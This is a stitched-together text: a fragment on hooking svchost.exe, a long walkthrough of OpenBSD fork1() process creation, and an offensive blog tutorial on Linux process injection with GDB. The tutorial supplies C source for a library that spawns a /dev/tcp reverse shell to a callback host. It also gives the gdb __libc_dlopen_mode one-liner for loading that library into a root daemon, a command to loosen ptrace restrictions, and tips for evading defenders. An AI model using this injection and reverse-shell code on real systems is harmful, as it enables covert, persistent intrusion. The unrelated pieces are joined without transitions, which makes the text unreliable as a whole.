  3. The malicious function returns, which continues the code initiated by the call tokernel32!CreateProcessA, and the main thread of svchost.exe will be scheduled to run by the operating system.
  4. The malicious process ends.

Since svchost.exe has been called with no arguments, it would normally immediately shut down because there is no service to launch. However, as part of its shutdown, it will call ntdll!RtlExitUserProcess, which hits the malicious hook, and the malicious code will take over at this point.

OpenBSD Kernel Internals — Creation of process from user-space to kernel space.

GDB + Qemu (env)

Hello readers,

I know this time it is a little late, but I am also busy with some other professional things. 🙂

This time let’s discuss about the process creation in OpenBSD operating system from user-space level to kernel space.

We will take an example of the user-space process that will be launched from the Command Line Interface (console), for example, “ls”, and then what happens in kernel-space as a result of it.

I will divide this series into 3 parts, like creationexecutionexit, because the creation of process itself took some amount of time for me to learn, and analyzing or tracking from user-space to kernel-space had to be done line by line.

I have used gdb to debug the process and analyze it line by line.

Now, I will not waste your time too much.

Let’s dive into the user-space to kernel-space and learn and see the beauty of puffer.

I have divided the full process and functions that are used in the kernel into the points, so, I think it will be easy to read and learn.

Now, suppose you have launched “ls” command from CLI (xterm):

Here, the parent process is “ksh”, that is, default shell in OpenBSD which invokes “ls” command or any other command.

Every process is created by sys_fork() , that is, fork system call which is indirectly (internally) calls fork1()

fork1 — kernel developer’s manual

fork1() creates a new process out of p1, which should be the current thread. This function is used primarily to implement the fork(2) and vfork(2) system calls, as well as the kthread_create(9) function.

Life cycle of a process (in brief):

“ls” → fork(2) → sys_fork() → fork1() → sys_execve() → sys_exit() → exit1()

Under the hood working of fork1()

After “ls” from user-space it goes to fork() (libc) then from there to sys_fork().


FORK_FORK: It is a macro which defines that the call is done by the fork(2)system call. Used only for statistics.

#define FORK_FORK 0x00000001

  • So, the value of flags variable is set to 1 , because the call is done by fork(2).
  • check for PTRACING then update the flags with PTRACE_FORK else leave it and return to the fork1()

Now, fork1()

fork1() initial code
  • The above code includes, curp->p_p->ps_comm is “ksh”, that is, parent process which will fork “ls” (user-space).
  • Initially some process structures, then, setting
    uid = curp->p_ucred->cr_ruid , it means setting the uid as real user id.
  • Then, the structure for process address space information.
  • Then, some variables and ptrace_state structure and then the condition checking using KASSERT.
  • fork_check_maxthread(uid) → it is used to the check or track the number of threads invoked by the specific uid .
  • It checks the number of threads invoked by specific uid shouldn’t be greater than the number of maximum threads allowed or also for maxthread —5 . Because the last 5 process from the maxthread is reserved for the root.
  • If it is greater than defined maxthread or maxthread — 5, it will print the messagetablefullonce every 10 seconds. Else, it will increment the number of threads.
  • Now, after fork_check_thread, again, the same implementation happens for tracking process. If you want you can have a look in our fork1 code screen-shot.

Now, we will proceed further,

fork1() code continued
  • It is changing the count of threads for a specific user via chgproccnt(uid,1).
  • uidinfo structure maintains every uid resource consumption counts, including the process count and socket buffer space usage.
  • uid_find function looks up and returns the uidinfo structure for uid. If no uidinfo structure exists for uid, a new structure will be allocated and initialized.

Then, it increments the ui_proccnt , that is, number of processes by diffand then returns count.

After, that, it is checks for the non-privileged uid and also that the number of process is greater than the soft limit of resources, that is, 9223372036854775807, from what I have found in gdb.

Have a look in the below screen-shot for the proper view of values:

(ddd) gdb output for resource limit

If non-privileged is allowed and the count is increased by the maximum resource limit, it will decrease the count via chgproccnt() by passing -1 as diff parameter and also decrease the number of processes and threads.

  • Next, the uvm_uarea_alloc() function allocates a thread’s ‘uarea’, the memory where its kernel stack and PCB are stored.

Now, it checks if the uaddr variable doesn’t contain any thread’s address, if it is zero, then it decrements the count of the number of process and thread.

Now, there are the some important functions:

→ thread_new(struct proc *parent, vaddr_t uaddr)

→ process_new(struct proc *p, struct process *parent, int flags)

thread_new(curp, uaddr)

Here, in the thread_new function, we will get our user-space process, that is, in our case “ls”. The process gets retrieved from the pool of process, that is, proc_pool via pool_get() function.

Then, we set the state of the thread to be SIDL , which means that the process/thread is being created by fork . We then setp →p_flag = 0.

Now, they are zeroing the section of proc . See, the below code snippet from sys/proc.h

code snippet for members that will be zeroed upon creation in fork, via memset

In above code snippet, all the variables will be zeroed via memset upon creation in the fork.

Then, they are copying the section from parent→p_startcopy to
p→p_startcopyvia memcpy. Have a look below in the screen-shot to know which of the field members will be copied.

code snippet for the members those will be copied upon in fork
  • The, crhold(p->p_ucred) means it will increment the reference count in struct ucred structure, that is, p->p_ucred->cr_ref++ .
  • Now, typecast the thread’s addr, that is, (struct user *)uaddr and save it in kernel’s virtual addr of u-area.
  • Now, it will initialize the timeout.

dummy function to show the timeout_set function working.

timeout_set(timeout, b, argument)

It means initialize the timeout struture and call the function b with argument .

timeout_set(struct timeout *new, void (*fn)(void *), void *arg)
        new->to_func = fn;
        new->to_arg = arg;
        new->to_flags = TIMEOUT_INITIALIZED;

scheduler_fork_hook(parent, p): It is a macro which will update the p_estcpu of child from parent’s p_estcpu.

p_estcpu holds an estimate of the amount of CPU that the process has used recently

/* Inherit the parent’s scheduler history */
#define scheduler_fork_hook(parent, child) do {    \
 (child)->p_estcpu = (parent)->p_estcpu;           \
} while (0)

Then, return the newly created thread p .

Now, another important function is process_new() which will create the process in a similar fashion to what we have seen above in the thread_newfunc.

  • process_new(struct proc *p, struct process *parent, int flags)

In above code snippet, the same thing is happening again like select process from process_pool via pool_get then zeroing using memset and copying using memcpy.

So, for the detailed explanation, please go through the thread_new() function first.

Next is initialization of process using process_initialize function.

process_initialize(pr, p)

ps_mainproc : It is the original and main thread in the process. It’s only special for the handling of p_xstat and some signal and ptrace behaviours that need to be fixed.

→Copy initial thread, that is, p to pr->mainproc .

→Initialize the queue with referenced by head. Here, head is pr→ps_threads. Then, Insert elm at the TAIL of the queue. Here, elm is p .

→set the number of references to 1, that is, pr->ps_refcnt = 1

→copy the process pr to the process of initial thread.

→set the same creds for process as the initial thread.

→condition check for the new thread and the new process via KASSERT.

→Initialize the List referenced by head. Here, head is pr->ps_children

→Again, initialize timeout. (for detail, see thead_new)

Now, after the process initialization, pid allocation takes place.

ps→ps_pid = allocpid(); allocpid() returns unused pid

allocpid() internally calls the arc4random_uniform() which again calls the arc4random() then via arc4random() a fully randomized number is returned which is used as pid.

Then, for the availability of pid, or in other words, for unused pid, it verifies that whether the new pid is already taken or not by any process. It verifies this one by one in the process, process groups, and zombie process by using function ispidtaken(pid_t pid) which internally calls these functions:

  • prfind(pid_t pid) : Locate a process by number
  • pgfind(pid_t pgid) : Locate a process group by number
  • zombiefind(pid_t pid :Locate a zombie process by number
code snippet for allocpid and ispidtaken

Now, store the pointer to parent process in pr→ps_pptr .

Increment the number of references count in process limit structure, that is, struct plimit .

Store the vnode of executable of parent into pr→ps_textvp ,that is, pr→ps_textvp = parent→ps_textvp; .

if (pr→ps_textvp)
        vref(pr→ps_textvp); /* vref --> vnode reference */

Above code snippet means, if valid vnode found then increment the v_usecount++ variable inside the struct vnode structure of the executable.

Now, the calculation for setting up process flags:

pr→ps_flags = parent →ps_flags & (PS_SUGID | PS_SUGIDEXEC | PS_PLEDGE | PS_EXECPLEDGE | PS_WXNEEDED);
pr →ps_flags = parent →ps_flags & (0x10 | 0x20 | 0x100000 | 0x400000 | 0x200000)
if (vnode of controlling terminal != NULL)
        pr→ps_flags |= parent→ps_flags & PS_CONTROLT;

process_new continued…

process_new continued…


* if child_able_to_share_file_descriptor_table_with_parent:
         pr->ps_fd = fdshare(parent)      /* share the table */
         pr->ps_fd = fdcopy(parent)       /* copy the table */
* if child_able_to_share_the_parent's_signal_actions:
         pr->ps_sigacts = sigactsshare(parent) /* share */
         pr->ps_sigacts = sigactsinit(parent)  /* copy */
* if child_able_to_share_the_parent's addr space:
         pr->ps_vmspace = uvmspace_share(parent)
         pr->ps_vmspace = uvmspace_fork(parent)
* if process_able_to_start_profiling:
         smartprofclock(pr);    /* start profiling on a process */
* if check_child_able_to_start_ptracing:
         pr->ps_flags |= parent->ps_flags & PS_PTRACED
* if check_no_signal_or_zombie_at_exit:
         pr->ps_flags |= PS_NOZOMBIE /*No signal or zombie at exit
* if check_signals_stat_swaping:
         pr->ps_flags |= PS_SYSTEM

update the pr→ps_flags with PS_EMBRYO by ORing it, that is,
pr→ps_flags |= PS_EMBRYO /* New process, not yet fledged */

membar_producer() → Force visibility of all of the above changes.

— All stores preceding the memory barrier will reach global visibility before any stores after the memory barrier reach global visibility.

In short, I think it is used to forcefully make visible changes globally.

Now, Insert the new elm, that is, pr at the head of the list. Here, head is allprocess .

  • return pr

fork1() continued…

fork1() continued…

p→p_fd and p→p_vmspace directly copy of pr→ps_fd and pr→ps_vmspace.



** if (process_has_no_signals_stats_or_swapping) then atomically set bits.

atomic_setbits_int(pr →ps_flags, PS_SYSTEM);

** if (child_is_suspending_the_parent_process_until_the_child_is terminated (by calling _exit(2) or abnormally), or makes a call to execve(2)) then atomically set bits,

atomic_setbits_int(pr →ps_flags, PS_PPWAIT);
atomic_setbits_int(pr →ps_flags, PS_ISPWAIT);

#ifdef KTRACE
/* Some KTRACE related things */

cpu_fork(curp, p, NULL, NULL, func, arg ?arg: p)

— To create or Update PCB and make child ready to RUN.

 * Finish creating the child thread. cpu_fork() will copy
 * and update the pcb and make the child ready to run. The
 * child will exit directly to user mode via child_return()
 * on its first time slice and will not return here.

Address space,
vm = pr→ps_vmspace

if (call is done by fork syscall); then
increment the number of fork() system calls.
update the vm_pages affected by fork() syscall with addition of data page and stack page.
else if (call is done by vfork() syscall); then
do as same as if it was fork syscall but for vfork system call. (see above if {for fork})
increment the number of kernel threads created.


If (process is being traced && created by fork system call);then
        The malloc() function allocates the uninitialized memory in the kernel address space for an object whose size is specified by size, that is, here, sizeof(*newptstat). And, struct ptrace_state *newptstat

allocate thread ID, that is, p→p_tid = alloctid();
This is also the same calling arc4random directly and using tfind function for finding the thread ID by number.

* inserts the new element p at the head	of the allprocess list.
* insert the new element p at the head of the thread hash list.
* insert the new element pr at the head of the process hash list.
* insert the new element pr after the curpr element.
* insert the new element pr at the head of the children process  list.

fork1() continued…

fork1 continued…

If (isProcessPTRACED())
then save the parent process id during ptracing, that is,
pr→ps_oppid = curpr→ps_pid .
If (pointer to parent process_of_child != pointer to parent process_of_current_process)
proc_reparent(pr, curpr→ps_pptr); /* Make current process the new parent of process child, that is, pr*/

Now, check whether newptstat contains some address, in our case, newptstat contains a kernel virtual address returned by malloc(9.
If above condition is True, that is, newptstat != NULL . Then, set the ptrace status:
Set newptstat point to the ptrace state structure. Then, make the newptstatpoint to NULL .

→Update the ptrace status to the curpr process and also the pr process.

curpr->ps_ptstat->pe_report_event = PTRACE_FORK;
pr->ps_ptstat->pe_report_event = PTRACE_FORK;
curpr->ps_ptstat->pe_other_pid = pr->ps_pid;
pr->ps_ptstat->pe_other_pid = curpr->ps_pid;

Now, for the new process set accounting bits and mark it as complete.

  • get the nano time to start the process.
  • Set accounting flags to AFORK which means forked but not execed.
  • atomically clear the bits.
  • Then, check for the new child is in the IDLE state or not, if yes then make it runnable and add it to the run queue by fork_thread_start function.
  • If it is not in the IDLE state then put arg to the current CPU, running on.

Freeing the memory or kernel virtual address that is allocated by malloc for newptstat via free .

Notify any interested parties about the new process via KNOTE .

Now, update the stats counter for successfully forked.

uvmexp.forks++; /* -->For forks */
if (flags & FORK_PPWAIT)
        uvmexp.forks_ppwait++; /* --> counter for forks where parent waits */
if (flags & FORK_SHAREVM)
        uvmexp.forks_sharevm++; /* --> counter for forks where vmspace is shared */

Now, pass pointer to the new process to the caller.

if (rnewprocp != NULL)
        *rnewprocp = p;
fork1 continued…
  • setting the PPWAIT on child and the PS_ISPWAIT on ourselves, that is, the parent and then go to the sleep on our process via tsleep .
  • Check, If the child is started with tracing enables && the current process is being traced then alert the parent by using SIGTRAP signal.
  • Now, return the child pid to the parent process.
  • return (0)

Then, finally, I have seen in the debugger that after the fork1, it jumps to sys/arch/amd64/amd64/trap.c file for system call handling and for the setting frame.

Some of the machine independent (MI) functions defined in sys/sys/syscall_mi.h file, like, mi_syscall()mi_syscall_return() and mi_child_return().

Then, after handling the system calls from trap.c then, control pass to the sys_execve system call, which I will explain later (in the second part) and also I will explain more about the trap.c code in upcoming posts. It has already become a long post.


Process Injection with GDB

Inspired by excellent CobaltStrike training, I set out to work out an easy way to inject into processes in Linux. There’s been quite a lot of experimentation with this already, usually using ptrace(2) orLD_PRELOAD, but I wanted something a little simpler and less error-prone, perhaps trading ease-of-use for flexibility and works-everywhere. Enter GDB and shared object files (i.e. libraries).

GDB, for those who’ve never found themselves with a bug unsolvable with lots of well-placed printf("Here\n") statements, is the GNU debugger. It’s typical use is to poke at a runnnig process for debugging, but it has one interesting feature: it can have the debugged process call library functions. There are two functions which we can use to load a library into to the program: dlopen(3)from libdl, and __libc_dlopen_mode, libc’s implementation. We’ll use __libc_dlopen_mode because it doesn’t require the host process to have libdl linked in.

In principle, we could load our library and have GDB call one of its functions. Easier than that is to have the library’s constructor function do whatever we would have done manually in another thread, to keep the amount of time the process is stopped to a minimum. More below.


Trading flexibility for ease-of-use puts a few restrictions on where and how we can inject our own code. In practice, this isn’t a problem, but there are a few gotchas to consider.


We’ll need to be able to attach to the process with ptrace(2), which GDB uses under the hood. Root can usually do this, but as a user, we can only attach to our own processes. To make it harder, some systems only allow processes to attach to their children, which can be changed via a sysctl. Changing the sysctl requires root, so it’s not very useful in practice. Just in case:

sysctl kernel.yama.ptrace_scope=0
# or
echo 0 > /proc/sys/kernel/yama/ptrace_scope

Generally, it’s better to do this as root.

Stopped Processes

When GDB attaches to a process, the process is stopped. It’s best to script GDB’s actions beforehand, either with -x and --batch or echoing commands to GDB minimize the amount of time the process isn’t doing whatever it should be doing. If, for whatever reason, GDB doesn’t restart the process when it exits, sending the process SIGCONT should do the trick.

kill -CONT <PID>

Process Death

Once our library’s loaded and running, anything that goes wrong with it (e.g. segfaults) affects the entire process. Likewise, if it writes output or sends messages to syslog, they’ll show up as coming from the process. It’s not a bad idea to use the injected library as a loader to spawn actual malware in new proceses.

On Target

With all of that in mind, let’s look at how to do it. We’ll assume ssh access to a target, though in principle this can (should) all be scripted and can be run with shell/sql/file injection or whatever other method.

Process Selection

First step is to find a process into which to inject. Let’s look at a process listing, less kernel threads:

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# ps -fxo pid,user,args | egrep -v ' \[\S+\]$'
    1 root     /sbin/init
  625 root     /lib/systemd/systemd-journald
  664 root     /sbin/lvmetad -f
  696 root     /lib/systemd/systemd-udevd
 1266 root     /sbin/iscsid
 1267 root     /sbin/iscsid
 1273 root     /usr/lib/accountsservice/accounts-daemon
 1278 root     /usr/sbin/sshd -D
 1447 root      \_ sshd: root@pts/1
 1520 root          \_ -bash
 1538 root              \_ ps -fxo pid,user,args
 1539 root              \_ grep -E --color=auto -v  \[\S+\]$
 1282 root     /lib/systemd/systemd-logind
 1295 root     /usr/bin/lxcfs /var/lib/lxcfs/
 1298 root     /usr/sbin/acpid
 1312 root     /usr/sbin/cron -f
 1316 root     /usr/lib/snapd/snapd
 1356 root     /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
 1358 root     /usr/lib/policykit-1/polkitd --no-debug
 1413 root     /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
 1415 root     /sbin/agetty --noclear tty1 linux
 1449 root     /lib/systemd/systemd --user
 1451 root      \_ (sd-pam)

Some good choices in there. Ideally we’ll use a long-running process which nobody’s going to want to kill. Processes with low pids tend to work nicely, as they’re started early and nobody wants to find out what happens when they die. It’s helpful to inject into something running as root to avoid having to worry about permissions. Even better is a process that nobody wants to kill but which isn’t doing anything useful anyway.

In some cases, something short-lived, killable, and running as a user is good if the injected code only needs to run for a short time (e.g. something to survey the box, grab creds, and leave) or if there’s a good chance it’ll need to be stopped the hard way. It’s a judgement call.

We’ll use 664 root /sbin/lvmetad -f. It should be able to do anything we’d like and if something goes wrong we can restart it, probably without too much fuss.


More or less any linux shared object file can be injected. We’ll make a small one for demonstration purposes, but I’ve injected multi-megabyte backdoors written in Go as well. A lot of the fiddling that went into making this blog post was done using pcapknock.

For the sake of simplicity, we’ll use the following. Note that a lot of error handling has been elided for brevity. In practice, getting meaningful error output from injected libraries’ constructor functions isn’t as straightforward as a simple warn("something"); return; unless you really trust the standard error of your victim process.

#include <pthread.h>
#include <stdlib.h>
#include <unistd.h>

#define SLEEP  120                    /* Time to sleep between callbacks */
#define CBADDR "<REDACTED>"           /* Callback address */
#define CBPORT "4444"                 /* Callback port */

/* Reverse shell command */
#define CMD "echo 'exec >&/dev/tcp/"\
            CBADDR "/" CBPORT "; exec 0>&1' | /bin/bash"

void *callback(void *a);

__attribute__((constructor)) /* Run this function on library load */
void start_callbacks(){
        pthread_t tid;
        pthread_attr_t attr;

        /* Start thread detached */
        if (-1 == pthread_attr_init(&attr)) {
        if (-1 == pthread_attr_setdetachstate(&attr,
                                PTHREAD_CREATE_DETACHED)) {

        /* Spawn a thread to do the real work */
        pthread_create(&tid, &attr, callback, NULL);

/* callback tries to spawn a reverse shell every so often.  */
void *
callback(void *a)
        for (;;) {
                /* Try to spawn a reverse shell */
                /* Wait until next shell */
        return NULL;

In a nutshell, this will spawn an unencrypted, unauthenticated reverse shell to a hardcoded address and port every couple of minutes. The __attribute__((constructor)) applied to start_callbacks() causes it to run when the library is loaded. All start_callbacks() does is spawn a thread to make reverse shells.

Building a library is similar to building any C program, except that -fPIC and -shared must be given to the compiler.

cc -O2 -fPIC -o libcallback.so ./callback.c -lpthread -shared

It’s not a bad idea to optimize the output with -O2 to maybe consume less CPU time. Of course, on a real engagement the injected library will be significantly more complex than this example.


Now that we have the injectable library created, we can do the deed. First thing to do is start a listener to catch the callbacks:

nc -nvl 4444 #OpenBSD netcat ftw!

__libc_dlopen_mode takes two arguments, the path to the library and flags as an integer. The path to the library will be visible, so it’s best to put it somewhere inconspicuous, like /usr/lib. We’ll use 2 for the flags, which corresponds to dlopen(3)’s RTLD_NOW. To get GDB to cause the process to run the function, we’ll use GDB’s print command, which conviently gives us the function’s return value. Instead of typing the command into GDB, which takes eons in program time, we’ll echo it into GDB’s standard input. This has the nice side-effect of causing GDB to exit without needing a quitcommand.

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# echo 'print __libc_dlopen_mode("/root/libcallback.so", 2)' | gdb -p 664
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
0x00007f6ca1cf75d3 in select () at ../sysdeps/unix/syscall-template.S:84
84      ../sysdeps/unix/syscall-template.S: No such file or directory.
(gdb) [New Thread 0x7f6c9bfff700 (LWP 1590)]
$1 = 312536496
(gdb) quit
A debugging session is active.

        Inferior 1 [process 664] will be detached.

Quit anyway? (y or n) [answered Y; input not from terminal]
Detaching from program: /sbin/lvmetad, process 664

Checking netcat, we’ve caught the callback:

$ nc -nvl 4444
Connection from <REDACTED> 50184 received!
ps -fxo pid,user,args
  664 root     /sbin/lvmetad -f
 1591 root      \_ sh -c echo 'exec >&/dev/tcp/<REDACTED>/4444; exec 0>&1' | /bin/bash
 1593 root          \_ /bin/bash
 1620 root              \_ ps -fxo pid,user,args

That’s it, we’ve got execution in another process.

If the injection had failed, we’d have seen $1 = 0, indicating__libc_dlopen_mode returned NULL.


There are several places defenders might catch us. The risk of detection can be minimized to a certain extent, but without a rootkit, there’s always some way to see we’ve done something. Of course, the best way to hide is to not raise suspicions in the first place.

Process listing

A process listing like the one above will show that the process into which we’ve injected malware has funny child processes. This can be avoided by either having the library doule-fork a child process to do the actual work or having the injected library do everything from within the victim process.

Files on disk

The loaded library has to start on disk, which leaves disk artifacts, and the original path to the library is visible in /proc/pid/maps:

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# cat /proc/664/maps                                                      
7f6ca0650000-7f6ca0651000 r-xp 00000000 fd:01 61077    /root/libcallback.so                        
7f6ca0651000-7f6ca0850000 ---p 00001000 fd:01 61077    /root/libcallback.so                        
7f6ca0850000-7f6ca0851000 r--p 00000000 fd:01 61077    /root/libcallback.so
7f6ca0851000-7f6ca0852000 rw-p 00001000 fd:01 61077    /root/libcallback.so            

If we delete the library, (deleted) is appended to the filename (i.e./root/libcallback.so (deleted)), which looks even weirder. This is somewhat mitigated by putting the library somewhere libraries normally live, like /usr/lib, and naming it something normal-looking.

Service disruption

Loading the library stops the running process for a short amount of time, and if the library causes process instability, it may crash the process or at least cause it to log warning messages (on a related note, don’t inject into systemd(1), it causes segfaults and makes shutdown(8) hang the box).

Process injection on Linux is reasonably easy:

  1. Write a library (shared object file) with a constructor.
  2. Load it with echo 'print __libc_dlopen_mode("/path/to/library.so", 2)' | gdb -p <PID>